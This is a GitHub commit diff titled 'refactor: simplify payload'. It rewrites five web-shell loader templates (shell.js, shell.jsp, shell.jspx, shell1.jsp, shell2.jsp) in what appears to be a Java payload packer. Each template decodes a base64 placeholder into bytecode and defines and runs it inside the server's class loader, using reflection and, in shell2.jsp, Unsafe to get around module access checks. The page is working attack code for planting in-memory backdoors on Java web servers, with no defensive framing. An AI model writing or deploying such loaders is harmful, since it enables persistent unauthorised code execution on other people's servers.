Skip to content

Commit a832228

Browse files
ReaJasonReaJason
committed
refactor: simplify payload
1 parent b71cd4a commit a832228

File tree

5 files changed

+20
-62
lines changed

5 files changed

+20
-62
lines changed

packer/src/main/resources/shell.js

Lines changed: 2 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -1,12 +1,9 @@
11
var base64Str = "{{base64Str}}";
2-
var clsString = java.lang.Class.forName("java.lang.String");
32
var bytecode;
43
try {
5-
var decoder = java.lang.Class.forName("java.util.Base64").getMethod("getDecoder").invoke(null);
6-
bytecode = decoder.getClass().getMethod("decode", clsString).invoke(decoder, base64Str);
4+
bytecode = java.util.Base64.getDecoder().decode(base64Str);
75
} catch (ee) {
8-
var decoder = java.lang.Class.forName("sun.misc.BASE64Decoder").newInstance();
9-
bytecode = decoder.getClass().getMethod("decodeBuffer", clsString).invoke(decoder, base64Str);
6+
bytecode = new sun.misc.BASE64Decoder().decodeBuffer(base64Str);
107
}
118
var clsByteArray = (new java.lang.String("a").getBytes().getClass());
129
var clsInt = java.lang.Integer.TYPE;

packer/src/main/resources/shell.jsp

Lines changed: 3 additions & 13 deletions
Original file line numberDiff line numberDiff line change
@@ -1,10 +1,3 @@
1-
<%@ page import="java.lang.*" %>
2-
<%@ page import="java.lang.Class" %>
3-
<%@ page import="java.lang.ClassLoader" %>
4-
<%@ page import="java.lang.ClassNotFoundException" %>
5-
<%@ page import="java.lang.Object" %>
6-
<%@ page import="java.lang.String" %>
7-
<%@ page import="java.lang.Thread" %>
81
<%!
92
public static class ClassDefiner extends ClassLoader {
103
public ClassDefiner(ClassLoader classLoader) {
@@ -21,12 +14,9 @@
2114
String base64Str = "{{base64Str}}";
2215
byte[] bytecode = null;
2316
try {
24-
Class base64Clz = Class.forName("java.util.Base64");
25-
Object decoder = base64Clz.getMethod("getDecoder").invoke(null);
26-
bytecode = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
27-
} catch (ClassNotFoundException ee) {
28-
Class datatypeConverterClz = Class.forName("javax.xml.bind.DatatypeConverter");
29-
bytecode = (byte[]) datatypeConverterClz.getMethod("parseBase64Binary", String.class).invoke(null, base64Str);
17+
bytecode = java.util.Base64.getDecoder().decode(base64Str);
18+
} catch (Throwable ee) {
19+
bytecode = new sun.misc.BASE64Decoder().decodeBuffer(base64Str);
3020
}
3121
Class clazz = new ClassDefiner(Thread.currentThread().getContextClassLoader()).defineClass(bytecode);
3222
clazz.newInstance();

packer/src/main/resources/shell.jspx

Lines changed: 3 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -16,12 +16,9 @@
1616
String base64Str = "{{base64Str}}";
1717
byte[] bytecode = null;
1818
try {
19-
Class base64Clz = classLoader.loadClass("java.util.Base64");
20-
Object decoder = base64Clz.getMethod("getDecoder").invoke(null);
21-
bytecode = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
22-
} catch (ClassNotFoundException ee) {
23-
Class datatypeConverterClz = classLoader.loadClass("javax.xml.bind.DatatypeConverter");
24-
bytecode = (byte[]) datatypeConverterClz.getMethod("parseBase64Binary", String.class).invoke(null, base64Str);
19+
bytecode = java.util.Base64.getDecoder().decode(base64Str);
20+
} catch (Throwable ee) {
21+
bytecode = new sun.misc.BASE64Decoder().decodeBuffer(base64Str);
2522
}
2623
Class clazz = new ClassDefiner(classLoader).defineClass(bytecode);
2724
clazz.newInstance();

packer/src/main/resources/shell1.jsp

Lines changed: 4 additions & 15 deletions
Original file line numberDiff line numberDiff line change
@@ -1,24 +1,13 @@
1-
<%@ page import="java.lang.*" %>
2-
<%@ page import="java.lang.Class" %>
3-
<%@ page import="java.lang.ClassLoader" %>
4-
<%@ page import="java.lang.ClassNotFoundException" %>
5-
<%@ page import="java.lang.Object" %>
6-
<%@ page import="java.lang.String" %>
7-
<%@ page import="java.lang.Thread" %>
81
<%
9-
ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
102
String base64Str = "{{base64Str}}";
113
byte[] bytecode = null;
124
try {
13-
Class base64Clz = classLoader.loadClass("java.util.Base64");
14-
Object decoder = base64Clz.getMethod("getDecoder").invoke(null);
15-
bytecode = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
16-
} catch (ClassNotFoundException ee) {
17-
Class datatypeConverterClz = classLoader.loadClass("javax.xml.bind.DatatypeConverter");
18-
bytecode = (byte[]) datatypeConverterClz.getMethod("parseBase64Binary", String.class).invoke(null, base64Str);
5+
bytecode = java.util.Base64.getDecoder().decode(base64Str);
6+
} catch (Throwable ee) {
7+
bytecode = new sun.misc.BASE64Decoder().decodeBuffer(base64Str);
198
}
209
java.lang.reflect.Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
2110
defineClass.setAccessible(true);
22-
Class clazz = (Class) defineClass.invoke(classLoader, bytecode, 0, bytecode.length);
11+
Class clazz = (Class) defineClass.invoke(Thread.currentThread().getContextClassLoader(), bytecode, 0, bytecode.length);
2312
clazz.newInstance();
2413
%>

packer/src/main/resources/shell2.jsp

Lines changed: 8 additions & 23 deletions
Original file line numberDiff line numberDiff line change
@@ -1,25 +1,4 @@
1-
<%@ page import="java.lang.*" %>
2-
<%@ page import="java.lang.Class" %>
3-
<%@ page import="java.lang.ClassLoader" %>
4-
<%@ page import="java.lang.ClassNotFoundException" %>
5-
<%@ page import="java.lang.Integer" %>
6-
<%@ page import="java.lang.Long" %>
7-
<%@ page import="java.lang.Object" %>
8-
<%@ page import="java.lang.String" %>
9-
<%@ page import="java.lang.Thread" %>
10-
<%@ page import="java.lang.Throwable" %>
111
<%
12-
String base64Str = "{{base64Str}}";
13-
byte[] bytecode = null;
14-
ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
15-
try {
16-
Class base64Clz = classLoader.loadClass("java.util.Base64");
17-
Object decoder = base64Clz.getMethod("getDecoder").invoke(null);
18-
bytecode = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
19-
} catch (ClassNotFoundException ee) {
20-
Class datatypeConverterClz = classLoader.loadClass("javax.xml.bind.DatatypeConverter");
21-
bytecode = (byte[]) datatypeConverterClz.getMethod("parseBase64Binary", String.class).invoke(null, base64Str);
22-
}
232
Object unsafe = null;
243
Object rawModule = null;
254
long offset = 48;
@@ -37,10 +16,16 @@
3716
getAndSetObjectM.invoke(unsafe, this.getClass(), offset, module);
3817
} catch (Throwable ignored) {
3918
}
40-
java.net.URLClassLoader urlClassLoader = new java.net.URLClassLoader(new java.net.URL[0], Thread.currentThread().getContextClassLoader());
19+
String base64Str = "{{base64Str}}";
20+
byte[] bytecode = null;
21+
try {
22+
bytecode = java.util.Base64.getDecoder().decode(base64Str);
23+
} catch (Throwable ee) {
24+
bytecode = new sun.misc.BASE64Decoder().decodeBuffer(base64Str);
25+
}
4126
java.lang.reflect.Method defMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
4227
defMethod.setAccessible(true);
43-
Class<?> clazz = (Class<?>) defMethod.invoke(urlClassLoader, bytecode, 0, bytecode.length);
28+
Class<?> clazz = (Class<?>) defMethod.invoke(Thread.currentThread().getContextClassLoader(), bytecode, 0, bytecode.length);
4429
if (getAndSetObjectM != null) {
4530
getAndSetObjectM.invoke(unsafe, this.getClass(), offset, rawModule);
4631
}

0 commit comments

Comments
 (0)